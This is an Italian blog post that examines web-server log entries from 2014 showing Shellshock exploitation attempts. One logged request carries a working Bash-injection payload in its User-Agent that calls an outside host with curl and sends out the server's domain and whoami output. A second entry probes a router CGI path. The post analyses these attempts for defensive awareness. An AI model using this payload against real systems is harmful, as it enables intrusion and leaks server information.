Come prevedibile si cominciano a vedere passare nei log dei server i tentativi di utilizzare la vulnerabilita' di Bash ShellShock
Ecco come si presenta un tentativo di exploit
(la riga xxxxxx.org indica il nome del server che e' sottoposto ad attacco)
xx.xxx.xx.xxx - - [05/Oct/2014:11:53:00 +0200] "GET / HTTP/1.1" 200 88868 "-" "() { :;}; /bin/bash -c \"curl http://ntontomou.com/custom/ping.php?domain=xxxxxxxxxx.org\\&whoami=`whoami`\""
in pratica si tratta di una enumerazione piu' che di un attacco. Lo script controlla se la macchina e' vulnerabile a ShellShock ed in caso positivo si collega al sito ntontomou.com aggiornando la pagina ping.php per creare un elenco
La cosa interessante e' che oltre al nome del dominio viene passato anche il risultato del comando whoami credo per mostrare con che utente viene gestito il webserver (tipo www-data)
Cercando tracce di ShellShock ho trovato anche questa richiesta
xx.xxxx.xxx.xxx - - [29/Sep/2014:11:53:39 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 519 "-" "-"
da una ricerca non si tratta di una scansione ShellShock ma si cerca di sfruttare una vulnerabilita' di router Cisco o Linksys (peccato che le macchine scansionate siano tutte Linux)
Iscriviti a:
Commenti sul post (Atom)
-
In questo post viene indicato come creare uno scatterplot dinamico basato da dati ripresi da un file csv (nel dettaglio il file csv e' c... -
Questo post e' a seguito di quanto gia' visto nella precedente prova Lo scopo e' sempre il solito: creare un sistema che permet... -
La scheda ESP32-2432S028R monta un Esp Dev Module con uno schermo TFT a driver ILI9341 di 320x240 pixels 16 bit colore.Il sito di riferiment...
Nessun commento:
Posta un commento